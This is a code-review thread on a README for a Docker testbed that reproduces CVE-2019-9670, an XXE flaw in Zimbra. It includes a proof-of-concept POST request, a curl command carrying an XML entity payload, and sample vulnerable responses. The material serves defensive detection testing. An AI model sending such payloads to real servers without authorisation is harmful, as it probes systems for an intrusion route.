Testbed for CVE-2019-9670 - Synacor Zimbra XXE (#113)
google/security-testbeds: zimbra/CVE-2019-9670/README.md

# Synacor Zimbra XXE (CVE-2019-9670)

This file describes how to setup a zimbra environment that is vulnerable (and not vulnerable) to CVE-2019-9670.

The vulnerability is an XXE affecting Synacor Zimbra Collaboration Suite.

## Testbed Setup
To setup the testbed, simply execute

```
./bootstrap.sh
```

The script will take care of building the docker images, deploying the docker containers and installing the zimbra applications.

- The vulnerable testbed is based on `8.7.1` version of zimbra, and
  specifically the following releases was used
  
  ```
  zcs-8.7.1_GA_1670.UBUNTU14_64.20161025045105.tgz
  ```
  
  The vulnerable testbed listens on port `8443`.
  
- The non vulnerable testbed is based on `8.8.15` version of zimbra, and
  specifically the following releases was used
  
  ```
  zcs-8.8.15_GA_3869.UBUNTU14_64.20190918004220.tgz
  ```
  
  The non vulnerable testbed listens on port `8500`.

> To test out the vulnerability, the following HTTP GET request can be used.
> 
> Request
> 
> ```
> POST /Autodiscover/Autodiscover.xml HTTP/1.1
> Host: 127.0.0.1
> Content-Type: application/xml
> Content-Length: 177
> 
> <!DOCTYPE foo [<!ELEMENT foo ANY>
> <!ENTITY xxe "Test"> ]>
> <Request>
> <EMailAddress>email</EMailAddress>
> <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
> </Request>
> ```

Reviewer: Please provide a cURL command to easily reproduce the vulnerability without requiring an intercepting proxy
````suggestion
## Reproduction Steps
To test out the vulnerability, the following curl command can be used:
```
curl -k -X $'POST'\
    --data-binary $'<!DOCTYPE foo [<!ELEMENT foo ANY>\x0d\x0a<!ENTITY xxe \"Test\"> ]>\x0d\x0a<Request>\x0d\x0a<EMailAddress>email</EMailAddress>\x0d\x0a<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\x0d\x0a</Request>' \
    $'https://{service-host}:{port}/Autodiscover/Autodiscover.xml'
```

which will generate a POST request similar to the one reported below:
```
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Content-Type: application/xml
Content-Length: 177

<!DOCTYPE foo [<!ELEMENT foo ANY>
<!ENTITY xxe "Test"> ]>
<Request>
<EMailAddress>email</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
```
````

Author: Useful feedback, thanks, added the curl command!

> When sent to the vulnerable port (`8443`), the response will contain the string `Test`.
> 
> Vulnerable Response

Reviewer: ```suggestion
### Vulnerable Response
When sent to the vulnerable instance on port `8443`, the response will contain the string `Test`, as shown in the example below:
```

Author: Updated

```
HTTP/1.1 503 Requested response schema not available Test
Date: Thu, 19 Dec 2024 09:14:18 GMT
Content-Type: text/html;charset=iso-8859-1
Cache-Control: must-revalidate,no-cache,no-store
Content-Length: 339

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>Error 503 Requested response schema not available Test</title>
</head>
<body><h2>HTTP ERROR 503</h2>
<p>Problem accessing /service/autodiscover/Autodiscover.xml. Reason:
<pre>    Requested response schema not available Test</pre></p>
</body>
</html>
```

> When sent to the non vulnerable port (`8500`), the response will not containg the string `Test`.
> 
> Non Vulnerable Response

Reviewer: ```suggestion
### Non Vulnerable Response
When sent to the non vulnerable instance on port `8500`, the response will not contain the string `Test`, as shown in the example below:
```

Author: Updated
